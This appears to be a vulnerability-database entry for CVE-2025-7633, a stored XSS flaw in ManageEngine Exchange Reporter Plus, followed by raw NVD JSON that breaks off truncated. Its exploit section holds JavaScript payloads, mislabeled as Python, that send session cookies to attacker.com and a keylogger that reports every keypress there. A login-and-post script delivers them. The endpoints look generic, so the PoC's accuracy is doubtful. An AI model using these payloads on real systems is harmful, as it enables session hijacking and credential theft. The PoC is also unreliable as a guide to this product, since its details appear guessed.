CVE-2025-7633

Description

Zohocorp ManageEngine Exchange Reporter Plus versions 5723 and below are vulnerable to the Stored XSS Vulnerability in the Custom report.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5700:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5701:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5702:*:*:*:*:*:* - VULNERABLE

ManageEngine Exchange Reporter Plus <= 5723

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-7633 Stored XSS PoC for ManageEngine Exchange Reporter Plus
// Target: ManageEngine Exchange Reporter Plus <= 5723
// Location: Custom Report creation/editing

// Step 1: Login with low-privilege account
const loginEndpoint = 'https://target.com/api/v3/login';
const credentials = {
    username: 'attacker_user',
    password: 'password123'
};

// Step 2: Create malicious custom report with XSS payload
const createReportEndpoint = 'https://target.com/api/reports/custom';
const maliciousPayload = {
    reportName: '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>',
    reportDescription: 'Test Report<script>alert(document.domain)</script>',
    reportType: 'exchange_mailbox',
    fields: [
        {
            name: 'field1',
            label: '<img src=x onerror="fetch(\"https://attacker.com/log?data=\"+btoa(document.cookie))\"/>'
        }
    ]
};

// Step 3: Send the malicious report creation request
fetch(createReportEndpoint, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Cookie': 'JSESSIONID=attacker_session'
    },
    body: JSON.stringify(maliciousPayload)
});

// Alternative payload - session hijacking via cookie theft
const sessionHijackPayload = `
<script>
    var cookies = document.cookie;
    new Image().src = "https://attacker.com/collect?cookies=" + encodeURIComponent(cookies);
</script>
`;

// Payload for keylogging
const keylogPayload = `
<script>
    document.onkeypress = function(e) {
        fetch("https://attacker.com/keylog?k=" + e.key);
    }
</script>
`;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-7633
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-7633
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-7633/
[4] VulDB https://vuldb.com/cve/CVE-2025-7633
[5] https://www.manageengine.com/products/exchange-reports/advisory/CVE-2025-7633.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-7633", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2025-11-11T11:15:36.367", "lastModified": "2025-11-24T15:43:26.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine Exchange Reporter Plus versions 5723 and below are vulnerable to the Stored XSS Vulnerability in the Custom report."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6", "matchCriteriaId": "E192E7F2-B940-4F0D-BA1D-D29799E434B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:-:*:*:*:*:*:*", "matchCriteriaId": "3FC399C6-4299-4744-9FC5-13CFE7478164"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5700:*:*:*:*:*:*", "matchCriteriaId": "E913F3D6-9F94-4130-94FF-37F4D81BAEF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5701:*:*:*:*:*:*", "matchCriteriaId": "34D23B58-2BB8-40EE-952C-1595988335CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5702:*:*:*:*:*:*", "matchCriteriaId": "322920C4-4487-4E44-9C40-2959F478A4FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5703:*:*:*:*:*:*", "matchCriteriaId": "3AD735B9-2CE2-46BA-9A14-A22E3FE21C6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5704:*:*:*:*:*:*", "matchCriteriaId": "014DB85C-DB28-4EBB-971A-6F8F964CE6FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5705:*:*:*:*:*:*", "matchCriteriaId": "5E9B0013-ABF8-4616-BC92-15DF9F5CB359"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5706:*:*:*:*:*:*", "matchCriteriaId": "5B744F32-FD43-47B8-875C-6777177677CD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5707:*:*:*:*:*:*", "matchCriteriaId": "F1BB6EEA-2BAA-4C48-8DA8-1E87B3DE611F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5708:*:*:*:*:*:*", "matchCriteriaId": "D3012C17-87F5-4FFD-B67B-BEFF2A390613"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5709:*:*:*:*:*:*", "matchCriteriaId": "1E33D368-2D81-4C7E-9405-7C0A86E97217"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5710:*:*:*:*:*:*", "matchCriteriaId": "7AA9384F-6401-4495-B558-23E5A7A7528C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5711:*:*:*:*:*:*", "matchCriteriaId": "E492F955-0734-4AE4-A59F-572ADF0CFE75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5712:*:*:*:*:*:*", "matchCriteriaId": "11B71FFC-FD2E-4F84-BB1E-55BCA5B51099"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5713:*:*:*:*:*:*", "matchCriteriaId": "531AFEFB-BBE6-42B2-8D37-B4098324AA87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5714:*:*:*:*:*:*", "matchCriteriaId": "01F80C71-110D-4776-B13F-08FCDE125B81"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5715:*:*:*:*:*:*", "matchCriteriaId": "2A6D8AAD-49B9-4216-9A81-A449A5D5549C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5717:*:*:*:*:*:*", "matchCriteriaId": "852DBCE6-B926-4B5B-B8C2-86569355153D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5718:*:*:*:*:*:*", "ma ... (truncated)